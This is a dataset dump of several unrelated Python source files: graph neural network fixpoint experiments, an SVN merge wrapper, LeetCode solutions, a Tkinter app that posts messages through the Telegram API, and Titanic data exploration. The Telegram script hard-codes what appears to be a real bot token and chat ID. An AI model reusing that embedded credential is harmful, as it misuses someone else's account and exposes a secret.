optimize_node_tu\nfrom src.utils.newton_method import newton_method_cora_reddit_ppi, newton_method_tu\nfrom src.utils.broyden_method import broyden_method_cora_reddit_ppi, broyden_method_tu\nfrom src.models.slp_gcn import SLP_GCN_4node, SLP_GCN_4graph\nfrom src.models.slp import SLP\nfrom src.models.gcn import GCN\nfrom src.models.last_layer import Last_Layer_4graph, Last_Layer_4node\n\nimport argparse\nimport torch\nimport yaml\nimport os\nimport numpy as np\nimport random\nimport torch.nn as nn\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"RUNNING ON: {}\".format(device))\n\ndef fix_random_seed(seed=0):\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n else:\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n\ndef main(args):\n\n # fix random seed if True\n if args.fix_random:\n fix_random_seed()\n\n # check if 'outputs' and 'checkpoints' directory exist, if not create\n outputs_dir = os.path.join(os.getcwd(), '../outputs')\n checkpoints_dir = os.path.join(os.getcwd(), '../checkpoints')\n if not os.path.exists(outputs_dir):\n os.makedirs(outputs_dir)\n if not os.path.exists(checkpoints_dir):\n os.makedirs(checkpoints_dir)\n\n # load dataset\n print(\"********** LOAD DATASET **********\")\n if args.dataset in 'cora, reddit-self-loop':\n g, features, labels, train_mask, test_mask = load_dataset(args)\n elif args.dataset == 'ppi':\n train_dataset, valid_dataset, train_dataloader, valid_dataloader = load_dataset(args)\n elif 'tu' in args.dataset:\n statistics, train_dataset, valid_dataset, train_dataloader, valid_dataloader = load_dataset(args)\n\n # build network\n print(\"********** BUILD NETWORK **********\")\n path = '../configs/' + args.dataset + '.yaml'\n config_file = os.path.join(os.getcwd(), path)\n with open(config_file, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n h_feats = config['hidden_features']\n\n if args.dataset in 'cora, reddit-self-loop':\n in_feats = features.shape[1]\n out_feats = torch.max(labels).item() + 1\n elif args.dataset == 'ppi':\n in_feats = train_dataset.features.shape[1]\n out_feats = train_dataset.labels.shape[1]\n elif 'tu' in args.dataset:\n in_feats = statistics[0]\n out_feats = statistics[1].item()\n\n if 'tu' not in args.dataset:\n slp_gcn = SLP_GCN_4node(in_feats, h_feats, out_feats).to(device)\n else:\n slp_gcn = SLP_GCN_4graph(in_feats, h_feats, out_feats).to(device)\n\n if args.train: # need to train the network\n print(\"********** TRAIN NETWORK **********\")\n if args.dataset in 'cora, reddit-self-loop':\n train_cora_reddit(slp_gcn, g, features, labels, train_mask, test_mask, args)\n elif args.dataset == 'ppi':\n train_ppi(slp_gcn, train_dataloader, valid_dataloader, args)\n elif 'tu' in args.dataset:\n train_tu(slp_gcn, train_dataloader, valid_dataloader, args)\n\n checkpoint_path = '../checkpoints/slp_gcn_' + args.dataset + '.pkl'\n checkpoint_file = os.path.join(os.getcwd(), checkpoint_path)\n torch.save(slp_gcn.state_dict(), checkpoint_file)\n\n else:\n checkpoint_path = '../checkpoints/slp_gcn_' + args.dataset + '.pkl'\n checkpoint_file = os.path.join(os.getcwd(), checkpoint_path)\n slp_gcn.load_state_dict(torch.load(checkpoint_file, map_location=device))\n\n # reduce/increase dimension of training set\n print(\"********** PREPROCESS FEATURES FOR TRAINING SET **********\")\n slp = SLP(in_feats, h_feats).to(device)\n model_dict = load_parameters(checkpoint_file, slp)\n slp.load_state_dict(model_dict)\n slp.eval()\n with torch.no_grad():\n if args.dataset in 'cora, reddit-self-loop':\n features_reduced = slp(features)\n elif args.dataset == 'ppi':\n features = torch.from_numpy(train_dataset.features).to(device)\n features_reduced = slp(features.float())\n elif 'tu' in args.dataset:\n train_dataset_reduced = train_dataset\n for data in train_dataset_reduced:\n data[0].ndata['feat'] = slp(data[0].ndata['feat'].float().to(device))\n\n # GCN\n gcn = GCN(h_feats).to(device)\n model_dict = load_parameters(checkpoint_file, gcn)\n gcn.load_state_dict(model_dict)\n\n # Find fixpoint for training set\n print(\"********** FIND FIXPOINT FOR TRAINING SET **********\")\n if args.method == 'graph_optimization':\n print(\"********** OPTIMIZATION ON WHOLE GRAPH **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = optimize_graph_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = optimize_graph_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = optimize_graph_tu(gcn, train_dataset_reduced, args, save=True)\n elif args.method == 'node_optimization':\n print(\"********** OPTIMIZATION ON EACH NODE **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, found_indices = optimize_node_cora_reddit_ppi(gcn, g, features_reduced, args)\n elif args.dataset == 'ppi':\n H, found_indices = optimize_node_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args)\n elif 'tu' in args.dataset:\n H, found_indices = optimize_node_tu(gcn, train_dataset_reduced, args)\n elif args.method == 'newton_method':\n print(\"********** NEWTON'S METHOD **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = newton_method_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = newton_method_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = newton_method_tu(gcn, train_dataset_reduced, args, save=True)\n elif 'broyden' in args.method:\n print(\"********** BROYDEN'S METHOD **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = broyden_method_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = broyden_method_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = broyden_method_tu(gcn, train_dataset_reduced, args, save=True)\n\n # Save result\n H_path = '../outputs/H_' + args.dataset + '_' + args.method + '.pkl'\n H_file = os.path.join(os.getcwd(), H_path)\n torch.save(H, H_file)\n cost_func_path = '../outputs/cost_func_' + args.dataset + '_' + args.method + '.pkl'\n cost_func_file = os.path.join(os.getcwd(), cost_func_path)\n torch.save(min_cost_func, cost_func_file)\n if 'tu' in args.dataset:\n indices_path = '../outputs/indices_' + args.dataset + '_' + args.method + '.pkl'\n indices_file = os.path.join(os.getcwd(), indices_path)\n torch.save(found_indices, indices_file)\n\n # Test fixpoint's performance in classification\n if args.test:\n print(\"********** TEST OF FIXPOINT **********\")\n # Reduce/increase dimension of validation set\n print(\"********** PREPROCESS FEATURES FOR VALIDATION SET **********\")\n slp.eval()\n with torch.no_grad():\n if args.dataset == 'ppi':\n features_val = torch.from_numpy(valid_dataset.features).to(device)\n features_reduced_val = slp(features_val.float())\n elif 'tu' in args.dataset:\n valid_dataset_reduced = valid_dataset\n for data in valid_dataset_reduced:\n data[0].ndata['feat'] = slp(data[0].ndata['feat'].float().to(device))\n\n # Find fixpoint for validation set\n print(\"********** FIND FIXPOINT FOR VALIDATION SET **********\")\n if args.method == 'graph_optimization':\n print(\"********** OPTIMIZATION ON WHOLE GRAPH **********\")\n if args.dataset == 'ppi':\n H_val, min_cost_func_val = optimize_graph_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = optimize_graph_tu(gcn, valid_dataset_reduced, args)\n elif args.method == 'node_optimization':\n print(\"********** OPTIMIZATION ON EACH NODE **********\")\n if args.dataset == 'ppi':\n H_val, found_indices_val = optimize_node_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val = optimize_node_tu(gcn, valid_dataset_reduced, args)\n elif args.method == 'newton_method':\n print(\"********** NEWTON'S METHOD **********\")\n if args.dataset == 'ppi':\n H_val, min_cost_func_val = newton_method_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = newton_method_tu(gcn, valid_dataset_reduced, args)\n elif 'broyden' in args.method:\n print(\"********** BROYDEN'S METHOD **********\")\n if args.dataset == 'ppi':\n H_val, min_cost_func_val = broyden_method_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = broyden_method_tu(gcn, valid_dataset_reduced, args)\n\n # Build last layer\n print(\"********** BUILD LAST LAYER **********\")\n if 'tu' in args.dataset:\n last_layer = Last_Layer_4graph(h_feats, out_feats)\n model_dict = load_parameters(checkpoint_file, last_layer)\n last_layer.load_state_dict(model_dict)\n else:\n last_layer = Last_Layer_4node(h_feats, out_feats)\n model_dict = load_parameters(checkpoint_file, last_layer)\n last_layer.load_state_dict(model_dict)\n\n # Train last layer\n print(\"********** TRAIN LAST LAYER **********\")\n if 'tu' in args.dataset:\n for graph_idx, (graph, graph_label) in enumerate(train_dataset):\n graph.ndata['feat'] = H[graph_idx]\n for graph_idx, (graph, graph_label) in enumerate(valid_dataset):\n graph.ndata['feat'] = H_val[graph_idx]\n train_tu(last_layer, train_dataloader, valid_dataloader, args)\n elif args.dataset in 'cora, reddit-self-loop':\n train_cora_reddit(slp_gcn, g, H, labels, train_mask, test_mask, args)\n elif args.dataset == 'ppi':\n train_dataset.features = H\n valid_dataset.features = H_val\n train_ppi(slp_gcn, train_dataloader, valid_dataloader, args)\n\nif __name__ == '__main__':\n\n # get parameters\n parser = argparse.ArgumentParser(description=\"Try to find fixpoint\")\n\n parser.add_argument('dataset', help='choose dataset from: cora, reddit-self-loop, ppi, aids, reddit-binary and imdb-binary')\n parser.add_argument('method', help='choose method from: graph_optimization, node_optimization and newton_method')\n parser.add_argument('--train', action='store_true', help='set true if model needs to be trained, i.e. no checkpoint available')\n parser.add_argument('--fix_random', action='store_true', help='set true if repeatability required')\n parser.add_argument('--test', action='store_true', help='set true to test fixpoint\\'s performance in classification task' )\n args = parser.parse_args()\n\n print(args)\n main(args)\n print(\"Finish!\")\n\n","sub_path":"src/run/fixpoint.py","file_name":"fixpoint.py","file_ext":"py","file_size_in_byte":12278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"335893980","text":"#!/usr/bin/env python\nimport sys\nimport os\n\n# Configure your favorite three-way diff program here.\n#DIFF3 = \"/usr/local/bin/my-diff3-tool\"\nDIFF3 = \"/home/justin/Public/p4v/bin/p4merge\"\n\n# Subversion provides the paths we need as the last three parameters.\nMINE = sys.argv[-3]\nOLDER = sys.argv[-2]\nYOURS = sys.argv[-1]\n\nR_LABEL = sys.argv[4]\nB_LABEL= sys.argv[6]\nL_LABEL = sys.argv[8]\n\n# Call the three-way diff command (change the following line to make\n# sense for your three-way diff program).\ncmd = [DIFF3, \"-nl\", L_LABEL, \"-nb\", B_LABEL, \"-nr\", R_LABEL, \"-nm\", \"Merged\", OLDER, YOURS, MINE, MINE]\nos.execv(cmd[0], cmd)\n\n# After performing the merge, this script needs to print the contents\n# of the merged file to stdout. Do that in whatever way you see fit.\n# Return an errorcode of 0 on successful merge, 1 if unresolved conflicts\n# remain in the result. Any other errorcode will be treated as fatal.\nsys.stdout.write(MINE)\n","sub_path":"diff3-svn-wrapper.py","file_name":"diff3-svn-wrapper.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"354145242","text":"# 746. Min Cost Climbing Stairs https://leetcode.com/problems/min-cost-climbing-stairs/\n\nclass Solution(object):\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n cost0, cost1 = cost[0], cost[1]\n # cost.append(0)\n for item in cost[2:]:\n cost0, cost1 = cost1, min(cost0, cost1) + item\n\n return min(cost0, cost1)\n\n#100%\n\nclass Solution(object):\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n # if len(cost) <=2:\n # return 0\n cost.append(0)\n for i in range(2, len(cost)):\n cost[i] = cost[i] + min(cost[i - 1], cost[i - 2])\n\n return cost[-1]\n#98%","sub_path":"src/MinCostClimbingStairsDP.py","file_name":"MinCostClimbingStairsDP.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"300515925","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 8 18:36:40 2019\n\n@author: kouhei\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport chainer\nfrom chainer import serializers, Chain ,Variable\nimport chainer.functions as F\nimport chainer.links as L\nmodelflag = False\ntime = 1\nb4 = 4\nbb4 = 4\nbbb4 = 4\nbbbb4 = 4\nbbbbb4 = 4\nbbbbbb4 = 4\neb4 = 2\nebb4 = 2\nebbb4 = 2\n\nclass MyChain(Chain):\n def __init__(self):\n super(MyChain, self).__init__(\n l1=L.Linear(9, 30),\n l2=L.Linear(30, 30),\n l3=L.Linear(30, 3),\n )\n def __call__(self, x):\n h1 = F.sigmoid(self.l1(x))\n h2 = F.sigmoid(self.l2(h1))\n h3 = self.l3(h2)\n return h3\nmodel = L.Classifier(MyChain())\nwhile modelflag == False:\n try:\n modelname = input('model name?')\n if modelname == \"exit\":\n exit()\n modelname = str(modelname)\n serializers.load_npz(modelname, model)\n modelflag = True\n except:\n print('that model does not exist!')\ncsvname = \"fortestlog.csv\"\ntry:\n open(csvname, 'x')\nexcept:\n pass\n#with open(csvname, 'a') as csvFile:\n #fieldnames = ['b4', 'bb4','bbb4','bbbb4','bbbbb4','bbbbbb4','eb4','ebb4','ebbb4']\n #writer = csv.DictWriter(csvFile, fieldnames=fieldnames)\n #writer.writeheader()\nwhile True:\n while time <= 9:\n comphand = random.randint(0, 2)\n handcheck = False\n print('computer prediction is : '+str(comphand))\n while handcheck == False:\n hand = input('input hand>>>')\n try:\n hand = int(hand)\n if hand == 0:\n handcheck = True\n elif hand == 1:\n handcheck = True\n hand = 0.5\n elif hand == 2:\n handcheck = True\n hand = 1\n else:\n print('input with 0,1 or 2 !!')\n except:\n print('input with 0,1 or 2 !!')\n handcheck = False\n comphand = comphand/2\n \n time = time + 1\n ebbb4 = ebb4\n ebb4 = eb4\n eb4 = comphand\n bbbbbb4 = bbbbb4\n bbbbb4 = bbbb4\n bbbb4 = bbb4\n bbb4 = bb4\n bb4 = b4\n b4 = hand\n while time >= 10:\n with open(csvname,'w') as csvFile:\n writer = csv.writer(csvFile)\n list1 = ['b4','bb4','bbb4','bbbb4','bbbbb4','bbbbbb4','eb4','ebb4','ebbb4']\n list2 = [b4,bb4,bbb4,bbbb4,bbbbb4,bbbbbb4,eb4,ebb4,ebbb4]\n writer.writerow(list1)\n writer.writerow(list2)\n csvFile.close()\n df = pd.read_csv(csvname)\n df = df.tail(1)\n #df.iloc[:,:] /= df.iloc[:,:].max()\n data = np.array(df.iloc[:,:]).astype(np.float32)\n outputArray = model.predictor(chainer.Variable(data))\n print(outputArray)\n outputArray = outputArray.data\n outputArray = np.argmax(outputArray)\n if outputArray == 0:\n comphand = 2\n if outputArray == 1:\n comphand = 0\n if outputArray == 2:\n comphand = 1\n #ansArray = np.argmax(outputArray, axis=1)\n handcheck = False\n print('computer prediction is : '),\n print(comphand)\n while handcheck == False:\n hand = input('input hand>>>')\n try:\n if modelname == \"exit\":\n exit()\n hand = int(hand)\n if hand == 0:\n handcheck = True\n elif hand == 1:\n handcheck = True\n elif hand == 2:\n handcheck = True\n else:\n print('input with 0,1 or 2 !!')\n except:\n print('input with 0,1 or 2 !!')\n handcheck = False\n time = time + 1\n ebbb4 = ebb4\n ebb4 = eb4\n eb4 = comphand\n bbbbbb4 = bbbbb4\n bbbbb4 = bbbb4\n bbbb4 = bbb4\n bbb4 = bb4\n bb4 = b4\n b4 = hand\n\"\"\"\n outputDF = pd.DataFrame(outputArray,columns=[\"output_0\",\"output_1\",\"output_2\"])\n\n ansDF = pd.DataFrame(ansArray,columns=[\"PredictedValue\"])\n\n result = pd.concat([df.disease,ansDF,outputDF],axis=1)\n\n correctCount = len(np.where(result.iloc[:,0] == result.iloc[:,1])[0])\n correctRate = correctCount/N\n print(\"データ数:\",N)\n print(\"正解数:\",correctCount)\n print(\"正答率:\",correctRate)\n \n #結果をcsvファイルへ出力\n result.to_csv(\"samplePredict.csv\",index=False)\n\"\"\"\n\n","sub_path":"janken_predict3.py","file_name":"janken_predict3.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"573693156","text":"#!/usr/bin/env python\n\"\"\"\nCSV data to windini_N.asc\n\"\"\"\nimport os\nimport shutil\nimport pandas as pd\nimport argparse\n\nHDWM_OPT = os.environ['HDWM_OPT']\nHDWM_OPT_DATA = os.environ['HDWM_OPT_DATA']\nOUTPUT = os.environ['OUTPUT']\nOUTPUT_FILE = os.environ['OUTPUT_FILE']\n\ndef run(path_datos, path_stations):\n \"\"\"dataframe in csv format, datum WGS84, epsg:4326:\n header: date,lat,lon,name,wind_dir,wind_speed\n \"\"\"\n data = pd.read_csv(path_datos, parse_dates=['date'])\n name_path_datos, extension_file = path_datos.split(\"/\").pop().split(\".\")\n stations = pd.read_csv(path_stations)\n stations['lat'] = stations['lat'].astype(str)\n stations['lon'] = stations['lon'].astype(str)\n HEIGHT = 10\n data['height'] = HEIGHT\n data = data.sort_values('date')\n N = data.groupby('date')\n hdwind = pd.DataFrame()\n\n for name, group in N:\n with open('windini_0.asc', 'w') as f:\n f.write('ReferenceSystem 1' + '\\n')\n f.write('InputPoints ' + str(len(group)) + '\\n')\n for index, input_data in group.iterrows():\n f.write(\n str(input_data.lat) + ' ' + str(input_data.lon) + ' ' +\n str(input_data.height) + ' ' + str(input_data.wind_speed) +\n ' ' + str(input_data.wind_dir) + '\\n')\n\n f.write('OutputLayers 1' + '\\n' + '10' + '\\n')\n f.write('OutputPoints ' + str(stations.shape[0]) + '\\n')\n for station in stations.itertuples():\n f.write(\n str(station.lat) + ' ' + str(station.lon) + ' ' +\n str(10) + '\\n')\n os.remove(HDWM_OPT_DATA + '/windini_0.asc')\n shutil.move('windini_0.asc', HDWM_OPT_DATA)\n os.system(HDWM_OPT + \"/HDWM\")\n df = pd.read_csv(OUTPUT_FILE)\n df['date'] = name\n df['lat'] = df['lat'].astype(str)\n df['lon'] = df['lon'].astype(str)\n df = pd.merge(df, stations, how='left', on=['lat', 'lon'])\n hdwind = hdwind.append(df)\n hdwind.to_csv(name_path_datos+'-HDWM.csv', index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n prog='data-HDWind-data', description='input data to HDWind model and output data')\n parser.add_argument('-d', default=os.getcwd(),\n help='dir to input data csv ')\n parser.add_argument('-s', help='csv with stations data: lon,lat,name')\n args = parser.parse_args()\n run(args.d, args.s)\n","sub_path":"dataModeled/HDWind.py","file_name":"HDWind.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"147409976","text":"'''\n@Description: \n@version: \n@Author: chenhao\n@Date: 2020-02-29 22:49:31\n@LastEditors: chenhao\n@LastEditTime: 2020-02-29 23:29:59\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # Recursion\n def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:\n if not t1 and not t2:\n return None\n \n if t1 is None and t2:\n return t2\n elif t1 and t2 is None:\n return t1\n \n t1.val += t2.val\n t1.left = self.mergeTrees(t1.left, t2.left)\n t1.right = self.mergeTrees(t1.right, t2.right)\n \n return t1\n \n \n # Iterative Method\n def mergeTrees2(self, t1: TreeNode, t2: TreeNode) -> TreeNode:\n if not (t1 and t2):\n return t2 if not t1 else t1\n \n queue = [(t1, t2)]\n while queue:\n r1, r2 = queue.pop(0)\n r1.val += r2.val\n if r1.left and r2.left:\n queue.append((r1.left, r2.left))\n elif not r1.left:\n r1.left = r2.left\n if r1.right and r2.right:\n queue.append((r1.right, r2.right))\n elif not r1.right:\n r1.right = r2.right\n return t1","sub_path":"4_Tree/Recursion/617. Merge Two Binary Trees.py","file_name":"617. Merge Two Binary Trees.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"415776940","text":"from app import db\nfrom sqlalchemy.dialects.postgresql import JSON\n\n\"\"\"\nclass Result(db.Model):\n\t__tablename__ = 'results'\n\n\tid = db.Column(db.Integer, primary_key=True)\n\turl = db.Column(db.String())\n\tresult_all = db.Column(JSON)\n\tresult_no_stop_words = db.Column(JSON)\n\n\tdef __init__(self, url, result_all, result_no_stop_words):\n\t\tself.url = url\n\t\tself.result_all = result_all\n\t\tself.result_no_stop_words = result_no_stop_words\n\n\tdef __repr__(self):\n\t\treturn ''.format(self.id)\n\"\"\"\n\nclass User(db.Model):\n\t__tablename__ = 'users'\n\n\tid = db.Column(db.Integer, primary_key=True)\n\temail = db.Column(db.String(120), unique=True)\n\tnickname = db.Column(db.String(120), unique=True)\n\n\tdef __init__(self, email):\n\t\tself.email = email\n\n\tdef __repr__(self):\n\t\treturn '' % self.email\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407238575","text":"# coding=utf-8\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef banner(value, arg):\n res = []\n for val in value:\n if val.region == arg:\n res.append(val)\n return res\n","sub_path":"uslugi/templatetags/banners.py","file_name":"banners.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"570498593","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nimport requests\n\n#La función sirve para conectar con la API de Telegram\ndef enviarDatos():\n #Mensajito es la variable donde se almacena el mensaje\n mensajito = textoComentario.get(1.0, \"end-1c\")\n\n def comunicacion_escrita(mensaje_bot):\n token_bot = '1032534984:AAEkVLBp9C8vQRXgZMUMdVt_3IGNqWF7GKc'\n bot_chatID = '851010840'\n enviar_com = 'https://api.telegram.org/bot' + token_bot + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + mensaje_bot\n\n respuesta = requests.get(enviar_com)\n\n return respuesta.json()\n\n enviarCOM = comunicacion_escrita(mensajito)\n print(enviarCOM)\n\n\napp = tk.Tk() \napp.title(\"Envío Comunicación\")\napp.geometry('600x400')\n\nlabelTop = tk.Label(app,\n text = \"Seleccione su Cargo\")\nlabelTop.grid(column=0, row=0)\n\ncomboExample = ttk.Combobox(app, state = \"readonly\",\n values=[\"Director/a\", \"Inspector General\", \"Jefe/a de UTP\"]) \nprint(dict(comboExample)) \ncomboExample.grid(column=1, row=1)\ncomboExample.current(0)\n\nprint(comboExample.current(), comboExample.get())\n\n#-----falta contatenar mensaje (cargo + punto aparte + mensaje)\n\ntextoComentario=Text(app, width=30, height=10)\ntextoComentario.grid(row=4, column=2, padx=10, pady=10)\n\n\nEnviarMensaje=Button(app, text=\"Enviar\", width=15, height=2, command=enviarDatos)\nEnviarMensaje.grid(row=5, column=2)\n\nbotonVolver=Button(app, text=\"Cerrar\", width=10, height=1, command=quit)\nbotonVolver.grid(row=5, column=1)\n\n\napp.mainloop()","sub_path":"enviarComunicacion.py","file_name":"enviarComunicacion.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"483826094","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nimport numpy as np\nimport time\n# load data and record runtime\nstart_time = time.time()\ndata = pd.read_csv(\"../../data/airlinedelay.csv\")\ndata.dropna(axis = 0, inplace = True)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#data = data[[\"DayOfWeek\",\"DepTime\",\"AirTime\", \"ArrDelay\", \"DepDelay\", \"Distance\", \"CarrierDelay\", \"WeatherDelay\", \"SecurityDelay\", \"Cancelled\"]]\n#data['ArrDelay'] = np.where(data['ArrDelay'] > 0, 1, 0)\nX = data[[\"DayOfWeek\",\"DepTime\",\"AirTime\", \"DepDelay\", \"Distance\", \"CarrierDelay\", \"WeatherDelay\", \"SecurityDelay\", \"Cancelled\"]]\ny = data[\"ArrDelay\"]\n#y = np.where(y>0, 1, 0)\nscaler = StandardScaler()\nX_std = scaler.fit_transform(X)\n\n\nclf = LogisticRegression(random_state=0)\nstart_time = time.time()\n# Train model\nmodel = clf.fit(X_std, y)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n","sub_path":"Project/code/local/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"295485395","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 3 15:56:16 2019\r\n\r\n@author: ahmetd\r\n\"\"\"\r\n\r\n# data analysis and wrangling\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random as rnd\r\n\r\n# visualization\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n# %matplotlib inline\r\n\r\n# machine learning\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC, LinearSVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.linear_model import Perceptron\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\ntrain_df = pd.read_csv(r'C:\\MyPython\\titanic\\train.csv')\r\ntest_df = pd.read_csv(r'C:\\MyPython\\titanic\\test.csv')\r\ncombine = [train_df, test_df]\r\n\r\nprint(train_df.columns.values)\r\n# Categorical: Survived, Sex, and Embarked. Ordinal: Pclass.\r\n# Continous: Age, Fare. Discrete: SibSp, Parch.\r\n\r\n# preview the data\r\ntrain_df.head()\r\nprint (train_df.Ticket)\r\n\r\n# mixed data types:\r\n# Ticket is a mix of numeric and alphanumeric data types. Cabin is alphanumeric.\r\n# These are candidates for correcting\r\ntrain_df.tail()\r\n\r\n# blank, null or empty values\r\n\r\ntype (train_df[\"Age\"])\r\n\r\nfor i in range (train_df[\"Age\"].size):\r\n entry = train_df.Age[i]\r\n# print (entry)\r\n if str(entry) == \"nan\": \r\n print (\"null entry in: \", i)\r\n elif float(entry) != entry: \r\n print (\"weird entry in: \", i)\r\n \r\n# Cabin > Age > Embarked features contain a number of null values in that order for the training dataset.\r\n# Cabin > Age are incomplete in case of test dataset. \r\n\r\ntrain_df.info()\r\ntest_df.info() \r\n# Age and Cabin lots of missing in test. so not to be used as features? \r\n# and fare is one missing in test\r\n\r\ntrain_df.describe()\r\ntrain_df.describe(include=['O']) # includes categorical features\r\n\r\n# complete and use Age feature as it is definitely correlated to survival.\r\n# complete and use the Embarked feature as it may also correlate with survival or another important feature.\r\n# PassengerId may be dropped from training dataset as it does not contribute to survival.\r\n# Name feature may be dropped. number of letters in name mean something? like wealth?\r\n\r\n# create new feature called Family based on Parch and SibSp to get total count of family members on board.\r\n# engineer the Name feature to extract Title as a new feature.\r\n# engineer the Name feature to extract Title as a new feature.\r\n# create a Fare range feature if it helps our analysis.\r\n\r\n# classifying:\r\n# Women (Sex=female) were more likely to have survived.\r\n# Children (Age0.5) among Pclass=1 and Survived (classifying #3). We decide to include this feature in our model.\r\n\r\ntrain_df[[\"Sex\", \"Survived\"]].groupby(['Sex'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# Sex=female had very high survival rate at 74% \r\n\r\ntrain_df[[\"SibSp\", \"Survived\"]].groupby(['SibSp'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\ntrain_df[[\"Parch\", \"Survived\"]].groupby(['Parch'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# SibSp and Parch These features have zero correlation for certain values. \r\n# It may be best to derive a feature or a set of features from these individual features\r\n\r\ng = sns.FacetGrid(train_df, col='Survived')\r\ng.map(plt.hist, 'Age', bins=20)\r\n# Observations:\r\n# Infants (Age <=4) had high survival rate. Oldest passengers (Age = 80) survived.\r\n# Large number of 15-25 year olds did not survive. Most passengers are in 15-35 age range.\r\n\r\n# We will consider Age (our assumption classifying #2) in our model training.\r\n# will Complete the Age feature for null values (completing #1).\r\n# We should band age groups (creating #3).\r\n\r\n\r\n\r\n\r\n# correlating numerical and ordinal features:\r\n# grid = sns.FacetGrid(train_df, col='Pclass', hue='Survived')\r\ngrid = sns.FacetGrid(train_df, col='Survived', row='Pclass', size=2.2, aspect=1.6)\r\ngrid.map(plt.hist, 'Age', alpha=.5, bins=20)\r\ngrid.add_legend();\r\n# Pclass must be considered for model training\r\n\r\n\r\n\r\n\r\n# Correlating categorical features:\r\n# grid = sns.FacetGrid(train_df, col='Embarked')\r\ngrid = sns.FacetGrid(train_df, row='Embarked', size=2.2, aspect=1.6)\r\ngrid.map(sns.pointplot, 'Pclass', 'Survived', 'Sex', palette='deep')\r\ngrid.add_legend()\r\n# Female passengers had much better survival rate than males. Exception in Embarked=C\r\n# Add Sex feature to model training.\r\n# Complete and add Embarked feature to model 